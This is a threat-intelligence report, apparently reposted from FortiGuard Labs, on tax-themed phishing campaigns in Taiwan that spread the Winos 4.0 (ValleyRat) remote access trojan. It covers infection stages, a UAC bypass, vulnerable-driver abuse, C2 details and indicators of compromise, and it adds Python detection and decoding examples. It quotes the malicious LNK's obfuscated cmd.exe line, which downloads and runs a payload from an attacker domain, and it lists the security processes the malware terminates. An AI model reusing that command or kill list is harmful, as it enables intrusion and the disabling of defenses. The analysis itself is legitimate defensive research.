Winos 4.0 – ValleyRat & Silver Fox

FortiGuard Labs recently observed several targeted phishing campaigns in Taiwan that use themes designed to exploit local business processes.  These campaigns disseminate Winos 4.0 (ValleyRat) and subsequent malicious plugins through weaponized attachments or embedded links.  The lures mimic official communications, such as tax audit notifications, tax filing software installers, and cloud-based e-invoice downloads.

Affected Platforms: Microsoft Windows

Impacted Users: Microsoft Windows

Impact: Widespread file encryption. Stolen data may be leveraged for follow-on attacks

Severity Level: High

The Labs’ analysis of domain registration data reveals that the attackers use a rotating set of domains and cloud services to host and distribute malware.  The highly volatile nature of this infrastructure renders traditional, static domain blocking insufficient as a primary defense.  Over the past two months, analysts have identified several delivery techniques, including malicious LNK files used as a downloader, DLL sideloading via legitimate executables to load shellcode, and BYOVD (Bring Your Own Vulnerable Driver) attacks using “wsftprm.sys.”  The following sections provide technical details and the associated activities of Silver Fox.[1]

Figure 1: Attacker’s domain

Campaign 1: Malicious LNK via Tax-Themed Phishing

The first campaign leverages a tax-themed lure to deceive users into executing a multi-stage infection chain.  The attack begins with a RAR archive named “taxIs_RX3001.rar,” which contains a benign decoy document and a malicious LNK file.

Figure 2: Archive contents with LNK and social-engineering decoys

The LNK file uses a relative path to invoke the system command processor: ..\..\..\..\Windows\System32\cmd.exe.  Through cmd.exe, the attacker executes a series of obfuscated commands designed to download the next-stage payload while evading detection.

Arguments:
/C md %public%\501 & %windir%\Sysnative\DeviceCredentialDeployment.exe & %windir%\System32\DeviceCredentialDeployment.exe & Copy /Y %windir%\System32\c^u^rl.e^x^e %public%\501\url.exe & %public%\501\ur^l.e^x^e -o %public%\501\Se^tup^64.exe h^tt^p^s:/^/bq^dr^zbyq.cn/Set^up^64.e^x^e & %public%\501\Setup64.exe

This script first creates a working directory at %public%\501.  It then performs system binary masquerading by copying the legitimate system utility curl.exe into this new directory under the name url.exe, which defeats simple filename-based monitoring.  The renamed copy is then used to download an executable named Setup64.exe from the remote domain bqdrzbyq[.]cn, and the final command runs it.  During this process, the script also launches DeviceCredentialDeployment.exe to maintain the appearance of normal system activity.
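As an added example (not code from the report or from FortiGuard Labs), the following Python shows how a detection rule can normalize the caret-obfuscated cmd.exe arguments above and flag the masquerading chain: curl.exe copied under a new name, a remote download by that copy, and execution of the file it wrote. The finding labels are an assumption chosen for illustration.

```python
import re

# Sample: the LNK's Arguments field quoted in the report above, used here as test input.
SAMPLE_ARGS = (
    r"/C md %public%\501 & %windir%\Sysnative\DeviceCredentialDeployment.exe & "
    r"%windir%\System32\DeviceCredentialDeployment.exe & "
    r"Copy /Y %windir%\System32\c^u^rl.e^x^e %public%\501\url.exe & "
    r"%public%\501\ur^l.e^x^e -o %public%\501\Se^tup^64.exe "
    r"h^tt^p^s:/^/bq^dr^zbyq.cn/Set^up^64.e^x^e & %public%\501\Setup64.exe"
)

def strip_carets(cmdline: str) -> str:
    """Undo cmd.exe escaping: '^X' becomes 'X', so '^^' is a literal caret.
    Simplification: carets inside double quotes are not treated as literals."""
    out, i = [], 0
    while i < len(cmdline):
        if cmdline[i] == "^":
            if i + 1 < len(cmdline):
                out.append(cmdline[i + 1])
            i += 2
        else:
            out.append(cmdline[i])
            i += 1
    return "".join(out)

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def analyze_cmdline(args: str) -> list:
    """Return findings for one cmd.exe argument string (labels are illustrative)."""
    plain = strip_carets(args)
    findings = ["caret_obfuscation"] if plain != args else []
    renamed, downloaded = set(), set()  # basenames of curl copies / files written by curl -o
    for cmd in (c.strip() for c in re.split(r"&&|\|\||&", plain) if c.strip()):
        tokens = cmd.split()
        head = basename(tokens[0])
        copy = re.match(r"(?i)copy\s+(?:/y\s+)?(\S+)\s+(\S+)", cmd)
        if copy and basename(copy.group(1)) == "curl.exe" and basename(copy.group(2)) != "curl.exe":
            renamed.add(basename(copy.group(2)))
            findings.append("curl_renamed_to:" + basename(copy.group(2)))
        if head in renamed or head == "curl.exe":
            url = re.search(r"(?i)\bhttps?://([^/\s]+)", cmd)
            if url:
                findings.append("download_from:" + url.group(1).lower())
            if "-o" in tokens and tokens.index("-o") + 1 < len(tokens):
                downloaded.add(basename(tokens[tokens.index("-o") + 1]))
        if head in downloaded:
            findings.append("executes_downloaded:" + head)
    return findings
```

Running `analyze_cmdline(SAMPLE_ARGS)` yields the four findings in order: obfuscation, the curl rename, the download domain, and execution of the downloaded file.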
Figure 3: The downloaded executable

Once the downloaded installer “64位安装包_特別版” (“64-bit installation package, special edition”) is executed, it extracts resources by locating an embedded executable in the resource section named “EXPAND.”  This embedded payload is extracted and written to the local path C:\ProgramData\Golden.  This stage serves as the foundation for the later deployment of Winos 4.0 (ValleyRat) and for loading the driver used for defense evasion.


Figure 4: The resources of the downloaded executable

The entire execution flow of Winos 4.0 is described in a later section.

Campaign 2: DLL Sideloading via Tax or E-Invoice Phishing

The second campaign involves distributing various forged Ministry of Finance documents via phishing emails.  One technique leverages the URL hxxp://taxfnat[.]tw/ to impersonate an official Taiwanese domain, while actually redirecting victims to a China-based cloud service at hxxps://twmoi2002.tos-cn-shanghai.volces[.]com/E-Invoice.rar to download a compressed archive.


Figure 5: Tax-themed phishing

Another variation is to send the e-invoice via email.  It displays the link as hxxps://www.einvoice.nat.gov[.]tw/, though it actually connects to hxxps://njhwuyklw[.]com/, which leads to the cloud download path hxxps://sdfw2026024.tos-cn-shanghai.volces[.]com/E-Invoice.rar.


Figure 6: E-invoice phishing mail

In the past two months, the downloaded archives have shifted strategy: instead of using an LNK shortcut as an intermediate downloader that fetches a single malicious executable, the attacker now delivers an archive containing a DLL that is sideloaded by a legitimate application.  This campaign uses the same method for loading the malicious driver as the first wave and connects to the same C2 address.


Figure 7: The executable and the malicious DLL file

In this campaign, the PDB path within the malicious DLL is C:\Users\Administrator\Desktop\大馬專案(二)\x64\Release\DLL.pdb.  This distinct project name, “大馬專案(二)” (roughly “Malaysia Project (2)”), suggests that the Silver Fox group has organized its operations into projects with specific names.  Through this string, we tracked another operation utilizing a legitimate file named 綜合所得稅電子結算申報繳稅.exe (an individual income tax e-filing and payment program) for DLL sideloading, though the C2 infrastructure for that campaign has migrated to 154[.]91[.]64[.]246.  These observations indicate that the attack campaign is likely to continue evolving.

Final Payload: Winos 4.0 (ValleyRat)

Before initiating its core functions, the payload calls RunUAC() to ensure it is operating within a high-integrity environment.  This process begins with a dynamic privilege check using CheckAdminPrivileges.  If the process already possesses administrative rights, it skips further escalation to minimize system noise.  Otherwise, it calls BypassUACViaDebugObject, a technique that combines RPC AppInfo service calls with Debug Object Hijacking.  By leveraging the whitelisted system binary computerdefaults.exe, it elevates its thread to administrator level without triggering a UAC prompt.


Figure 8: Bypass UAC

Winos 4.0’s data fields contain numerous Base64-encoded strings used to load the driver and to target security software.  The core driver involved is wsftprm.sys (File Description: Topaz OFD - PM), a validly signed 64-bit Windows kernel-mode driver (version 2.0.0.0).  To load this driver, the malware performs a Bring Your Own Vulnerable Driver (BYOVD) attack, dynamically resolving Native APIs from ntdll.dll such as RtlInitUnicodeString, NtLoadDriver, and RtlAdjustPrivilege, which allows it to bypass standard service monitoring.



Figure 9: The extracted driver

It also queries the VulnerableDriverBlocklistEnable value under SYSTEM\CurrentControlSet\Control\CI\Config and its backup path under ControlSet001.  Depending on the system’s defense state, it dynamically adjusts the registry path used to load the driver.  In these steps, analysts also found that error messages are encoded in Simplified Chinese (GBK).


Figure 10: Checks the registry setting

Once kernel privileges are obtained through wsftprm.sys, the malware enters a monitoring loop to cross-reference active processes against a hardcoded list of security products.  The target list includes ZhuDongFangYu.exe, 360tray.exe, 360sd.exe, HipsDaemon.exe, HipsMain.exe, HipsTray.exe, wsctrlsvc.exe, SecurityHealthHost.exe, SecurityHealthService.exe, SecurityHealthSystray.exe, MpDefenderCoreService.exe, 2345SoftmgrSvc.exe, 2345SoftmgrDaemon.exe, 2345SoftMgr.exe, MSPCManager.exe, MSPCManagerService.exe, smartscreen.exe, MsMpEng.exe, NisSrv.exe, wsc_proxy.exe, wsccommunicator.exe, AvastSvc.exe, bdservicehost.exe, AVGSvc.exe, 360rps.exe, 360rp.exe, qmbsrv.exe, QQPCTray.exe, QQPCRTP.exe, uiWinMgr.exe, uiSeAgnt.exe, PtSessionAgent.exe, PtWatchDog.exe, PtSvcHost.exe, AMSPTelemetryService.exe, unsecapp.exe, uiWatchDog.exe, coreFrameworkHost.exe, coreServiceShell.exe, TmsaInstance64.exe, and ConfigSecurityPolicy.exe.

This list covers a wide range of protection tools, including Microsoft Defender, Trend Micro, Symantec, and security suites such as HuoRong and 360.  Terminating these processes achieves a clean environment for Winos 4.0 to persist, escalate privileges, and maintain remote control without interference.

Figure 11: Targeted list in double Base64 encoding

Winos 4.0 hides its C2 address, 47[.]76[.]86[.]151, using double Base64 encoding (TkRjdU56WXVPRFl1TVRVeA==).  After verifying the system version, it connects to its C2 to load the core component, 上线模块.dll (online module).
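As an added example (not code from the report or from FortiGuard Labs), the following Python peels nested Base64 layers from configuration strings such as the C2 string above and the double-encoded process kill list in Figure 11, then tags each result for triage. The process-name samples are constructed here with a helper, and the classification rules are an assumption for illustration.

```python
import base64
import binascii
import re

IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")

def decode_nested_base64(value: str, max_rounds: int = 4) -> tuple:
    """Peel Base64 layers until the text is no longer valid Base64 or no longer
    printable ASCII; returns (plaintext, layers_removed)."""
    text = value.strip()
    for layers in range(max_rounds):
        try:
            candidate = base64.b64decode(text, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            return text, layers
        if not candidate or not candidate.isprintable():
            return text, layers
        text = candidate
    return text, max_rounds

def classify(text: str) -> str:
    """Tag a decoded string the way an analyst would triage it (assumed rules)."""
    if IPV4.match(text):
        return "ipv4"
    if text.lower().endswith(".exe"):
        return "process_name"
    return "other"

def decode_config_strings(values) -> list:
    """Decode and tag each configuration string: [(plaintext, layers, kind), ...]."""
    result = []
    for value in values:
        text, layers = decode_nested_base64(value)
        result.append((text, layers, classify(text)))
    return result

def double_encode(text: str) -> str:
    """Constructed helper that reproduces the two-layer encoding for test data."""
    return base64.b64encode(base64.b64encode(text.encode("ascii"))).decode("ascii")

# Constructed sample: the C2 string quoted in the report plus two names from the
# process kill list, double-encoded here for illustration.
SAMPLE_STRINGS = [
    "TkRjdU56WXVPRFl1TVRVeA==",
    double_encode("MsMpEng.exe"),
    double_encode("ZhuDongFangYu.exe"),
]
```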



Figure 12: C2 connection and the downloaded online module

It then downloads the other plugins and 登录模块 (login module) and stores them directly in the registry, allowing them to be loaded into memory without writing files to disk.  The specific plugins identified in this campaign are 文件管理 (file management), 高速屏幕 (high-speed screen), 娱乐屏幕 (entertainment screen), 差异屏幕 (differential screen), and 系统管理 (system management).  Together, these plugins provide file management, screen capture, remote control, and system management.

Figure 13: The modules saved in the registry

Investigation and Attribution

Based on similar file path patterns, analysts identified a related archive hosted at hxxps://twtaxgo[.]cn/uploads/20260129/taxIs_RX3001.7z.

Researchers’ tracking confirms that campaigns dating back to January 2026 utilize the same C2, 47[.]76[.]86[.]151.

Further analysis of domain registration data revealed a consistent registrant name, "李积强," and an associated email address, gongluliu@zju.edu[.]cn, which also appeared in the text file from the first campaign.  

Also, the LNK metadata contains the MachineID “desktop-t3n3m3q.”  This specific ID was observed in Silver Fox APT activity in August 2025, during an environmental check routine.  This strongly suggests that the identifier belongs to systems used by the attackers during malware development.  Given the identical driver-abuse techniques and overlapping infrastructure, analysts assess with high confidence that these campaigns are the work of the same specialized subgroup within Silver Fox.

Conclusion

Since last year, FortiGuard Labs has exposed multiple operations involving Winos 4.0 (ValleyRat), revealing a persistent threat actor specifically targeting organizations across Asia.  This group demonstrates a high level of sophistication in designing localized phishing lures, often registering domains that appear to be related to country-specific text to enhance the perceived legitimacy of their tax-themed and official document decoys.

The technical evolution of this group is evident in their shift toward memory-resident execution for additional plugins, leaving minimal physical footprints on the local disk.  The exposure of internal project names, such as 大馬專案, alongside consistent development machine identifiers, indicates a well-organized operation with a mature toolset and structured planning.  As this threat actor continues to refine its evasion techniques and infrastructure, users and organizations must remain highly vigilant. It is critical to treat any documents or links from non-trusted sources with extreme caution to prevent infection by this evolving threat.

IOCs

Domains


IP

47[.]76[.]86[.]151

URLs

hxxps://twmoi2002.tos-cn-shanghai.volces[.]com/E-Invoice.rar
hxxps://sdfw2026024.tos-cn-shanghai.volces[.]com/E-Invoice.rar
hxxps://twtaxgo[.]cn/uploads/20260129/taxIs_RX3001.7z

SHA256

64ee7a2e6259286311c8ba1c7b6d30e1e52fe78befcfd1b71b291c788f3e3e6a Setup.exe
156f31b37ee0d6e7f87cdc94dcd2d3b084b2e15da08bd8588e17d6bdc43159fe AISafeSDK64.dll

 

This article is shared at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  We provide indicators-of-compromise information via a notification service (RedXray) or an analysis service (CTAC).  For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com    


[1] https://www.fortinet.com/blog/threat-research/massive-winos-40-campaigns-target-taiwan?lctg=141970831
